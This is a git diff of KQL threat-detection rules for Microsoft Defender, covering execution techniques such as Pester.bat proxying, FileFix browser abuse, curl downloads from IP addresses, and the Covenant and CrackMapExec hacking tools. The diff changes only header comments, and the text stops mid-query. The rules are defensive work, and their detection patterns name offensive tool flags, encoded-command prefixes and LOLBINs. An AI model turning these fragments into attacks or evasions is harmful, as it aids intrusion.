Exchange PowerShell Snap-Ins Usage -// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-03-03 -// Level: high -// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 - -DeviceProcessEvents +// Title: Exchange PowerShell Snap-Ins Usage +// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/Execution/execute_code_with_pester_bat.kql index 1269c58c..8f44355c 100644 --- a/KQL/rules/Execution/execute_code_with_pester_bat.kql +++ b/KQL/rules/Execution/execute_code_with_pester_bat.kql @@ -1,12 +1,12 @@ -// Title: Execute Code with Pester.bat -// Author: Julia Fomina, oscd.community -// Date: 2020-10-08 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 -// False Positives: -// - Legitimate use of Pester for writing tests for Powershell scripts and modules - -DeviceProcessEvents +// Title: Execute Code with Pester.bat +// Author: Julia Fomina, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents | where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql index 34eb88ed..3df968c6 100644 --- a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql +++ b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql @@ -1,12 +1,12 @@ -// Title: Execute Code with Pester.bat as Parent -// Author: frack113, Nasreddine Bencherchali -// Date: 2022-08-20 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 -// False Positives: -// - Legitimate use of Pester for writing tests for Powershell scripts and modules - -DeviceProcessEvents +// Title: Execute Code with Pester.bat as Parent +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-20 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql index 4a6dfd1a..06c1acc2 100644 --- a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql +++ b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql @@ -1,12 +1,12 @@ -// Title: Execution of Powershell Script in Public Folder -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-04-06 -// Level: high -// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Execution of Powershell Script in Public Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql index 6134260b..5567e7e9 100644 --- a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql +++ b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql @@ -1,10 +1,10 @@ -// Title: Execution Of Script Located In Potentially Suspicious Directory -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: medium -// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Execution Of Script Located In Potentially Suspicious Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/Execution/file_decryption_using_gpg4win.kql index e39ad38d..c701334d 100644 --- a/KQL/rules/Execution/file_decryption_using_gpg4win.kql +++ b/KQL/rules/Execution/file_decryption_using_gpg4win.kql @@ -1,10 +1,10 @@ -// Title: File Decryption Using Gpg4win -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-09 -// Level: medium -// Description: Detects usage of Gpg4win to decrypt files -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Decryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to decrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql index b207198e..74fa57c8 100644 --- a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql +++ b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download From IP URL Via Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-18 -// Level: medium -// Description: Detects file downloads directly from IP address URL using curl.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Download From IP URL Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: medium +// Description: Detects file downloads directly from IP address URL using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'"))) \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql index 13bb5065..c8c8fd94 100644 --- a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql +++ b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql @@ -1,10 +1,10 @@ -// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022-11-30 -// Level: high -// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-11-30 +// Level: high +// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/Execution/file_encryption_using_gpg4win.kql index 0b41139c..482ba056 100644 --- a/KQL/rules/Execution/file_encryption_using_gpg4win.kql +++ b/KQL/rules/Execution/file_encryption_using_gpg4win.kql @@ -1,10 +1,10 @@ -// Title: File Encryption Using Gpg4win -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-09 -// Level: medium -// Description: Detects usage of Gpg4win to encrypt files -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Encryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to encrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql index 650b7be1..3b10723c 100644 --- a/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql +++ b/KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql @@ -1,10 +1,10 @@ -// Title: File With Uncommon Extension Created By An Office Application -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects the creation of files with an executable or script extension by an Office application. -// MITRE Tactic: Execution -// Tags: attack.t1204.002, attack.execution - -DeviceFileEvents +// Title: File With Uncommon Extension Created By An Office Application +// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the creation of files with an executable or script extension by an Office application. +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.execution + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not((((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\BackstageInAppNavCache\\") and FolderPath endswith ".com") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com")))) \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql index 2968f382..e2daa199 100644 --- a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql +++ b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql @@ -1,10 +1,10 @@ -// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse -// Author: Alfie Champion (delivr.to) -// Date: 2025-07-05 -// Level: high -// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004 - -DeviceRegistryEvents +// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse +// Author: Alfie Champion (delivr.to) +// Date: 2025-07-05 +// Level: high +// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 + +DeviceRegistryEvents | where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql index ce73c5e5..57df535d 100644 --- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql +++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql @@ -1,14 +1,14 @@ -// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse -// Author: 0xFustang -// Date: 2025-06-26 -// Level: high -// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, -// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. -// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004 -// False Positives: -// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools - -DeviceProcessEvents +// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse +// Author: 0xFustang +// Date: 2025-06-26 +// Level: high +// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, +// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. +// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 +// False Positives: +// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools + +DeviceProcessEvents | where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql index 35d2ea1a..cbd7225c 100644 --- a/KQL/rules/Execution/forfiles_command_execution.kql +++ b/KQL/rules/Execution/forfiles_command_execution.kql @@ -1,14 +1,14 @@ -// Title: Forfiles Command Execution -// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022-06-14 -// Level: medium -// Description: Detects the execution of "forfiles" with the "/c" flag. -// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. -// Can be used to bypass application whitelisting. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use via a batch script or by an administrator. - -DeviceProcessEvents +// Title: Forfiles Command Execution +// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects the execution of "forfiles" with the "/c" flag. +// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. +// Can be used to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use via a batch script or by an administrator. + +DeviceProcessEvents | where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql index 2d845dfc..98e445c1 100644 --- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql +++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql @@ -1,13 +1,13 @@ -// Title: Fsutil Behavior Set SymlinkEvaluation -// Author: frack113 -// Date: 2022-03-02 -// Level: medium -// Description: A symbolic link is a type of file that contains a reference to another file. -// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Fsutil Behavior Set SymlinkEvaluation +// Author: frack113 +// Date: 2022-03-02 +// Level: medium +// Description: A symbolic link is a type of file that contains a reference to another file. +// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql index 62765b23..8dd7b57c 100644 --- a/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql +++ b/KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql @@ -1,12 +1,12 @@ -// Title: GAC DLL Loaded Via Office Applications -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: high -// Description: Detects any GAC DLL being loaded by an Office Product -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - Legitimate macro usage. Add the appropriate filter according to your environment - -DeviceImageLoadEvents +// Title: GAC DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects any GAC DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents | where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql index 7c1d5929..f458c6e7 100644 --- a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql +++ b/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Covenant PowerShell Launcher -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2020-06-04 -// Level: high -// Description: Detects suspicious command lines used in Covenant luanchers -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003 - -DeviceProcessEvents +// Title: HackTool - Covenant PowerShell Launcher +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2020-06-04 +// Level: high +// Description: Detects suspicious command lines used in Covenant luanchers +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1564.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA") \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql index 9892aa5a..a86b278f 100644 --- a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql +++ b/KQL/rules/Execution/hacktool_crackmapexec_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - CrackMapExec Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 - -DeviceProcessEvents +// Title: HackTool - CrackMapExec Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.credential-access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 + +DeviceProcessEvents | where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql index 074c02c8..633db41a 100644 --- a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql +++ b/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql @@ -1,10 +1,10 @@ -// Title: HackTool - CrackMapExec PowerShell Obfuscation -// Author: Thomas Patzke -// Date: 2020-05-22 -// Level: high -// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005 - -DeviceProcessEvents +// Title: HackTool - CrackMapExec PowerShell Obfuscation +// Author: Thomas Patzke +// Date: 2020-05-22 +// Level: high +// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027.005 + +DeviceProcessEvents | where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and 